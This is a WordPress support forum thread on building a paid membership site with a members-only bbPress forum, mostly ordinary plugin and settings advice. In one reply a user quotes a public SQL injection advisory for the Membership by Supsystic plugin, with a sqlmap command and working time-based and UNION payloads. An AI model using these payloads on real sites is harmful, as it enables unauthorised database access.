Skip to:

Creating an Membership Site + Forum

  • kantholz93


    I wanted to create a membership site with: Membership by Supsystic and integrate bbPress for the forum part.
    But this has been exploited on February 8th, so it’s no longer an option.

    We wanted that:
    – members can interact with each other
    – the forum is only for registered members
    – members need approval for registration (they have to pay first)
    – some wordpress pages are only for registrated members
    – all other wordpress pages are visible for everyone

    All of this was achievable with the Members by Supsystic Plugin + the paid extension to limit some pages only for members.

    Is there any alternative that works with bbPress? Our forum already uses bbPress and we wanted to keep it that way.

    Thank you very much for any help!

    This is our actual membership page on our website (idk if you need it):



Viewing 6 replies - 1 through 6 (of 6 total)

  • Robin W


    my virus checker doesn’t like sploitus website – what is the nature of the exploitation ?



    The Plugin was (luckily) not installed. We just decided to use it, then we saw that wordpress has taken it down on their Plugin Site.

    The exploit seems to be an SQL Injection.

    # 1. Description

    The GET parameters “search” and “sidx” does not sanitize user input when searching for badges.

    # 2. Proof of Concept (PoC)

    Use ZAP/Burp to capture the web request when searching for data and save it to request.txt

    sqlmap -r request.txt –dbms=mysql -p search

    Parameter: search (GET)
    Type: time-based blind
    Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND ‘trjK’=’trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc

    Type: UNION query
    Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL– -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc

    Robin W


    If you are happy to have a hands on approach to user registrations, then you probably don’t need a membership plugin.

    As far as the bbpress part goes

    forums set to public are viewable by anyone
    forums set to private are viewable only by registered users

    so if you set forums to private they will not appear to unregistered users, so only visible once a user has logged in. If you set not to allow anonymous posting (dashboard>settings>forums) , then only registered users will be able to post.

    bbpress just uses wordpress users for login and registration with an extra bbpress parameter, so you can just use wordpress to set up users.

    If you are going to have manual registration, then you turn off ‘anyone can register’ in wordpress (dashboard>settings>general>membership), and create a form using a form plugin (eg contact form 7) to let users ask to register with whatever fields you want. This will be emailed to whoever you want, who can then decide if they should allow membership.
    You can then take payment manually (eg bank transfer) or via say a Paypal link on your site.

    The approver would then add the user (2 minutes or less).

    As far as wordpress page content then use a plugin that restricts content to registered users such as

    Content Control – User Access Restriction Plugin

    finally you would use

    bbPress Messages

    to allow uses to message each other – don’t worry that this plugin has not been updated for a while – it is stable and works

    as far as I can see that would meet your requirements list.



    Thank you very much! I will implement and test it over the next few days, but your solution sounds just perfect!

    You saved me! Thanks. 🙂



    I’ve implemented your solution and it works pretty good so far. Thanks again.

    When I go to the URL of a private Forum (while not logged in) it just throws a 404. Can I somehow redirect the User to a Login page?

    Robin W


    bbp style pack

    once activated go to

    dashboard>settings>bbp style pack>Subscription Emails and there is a box to tick item 2 auto login and the appropriate login

Viewing 6 replies - 1 through 6 (of 6 total)
  • You must be logged in to reply to this topic.
Skip to toolbar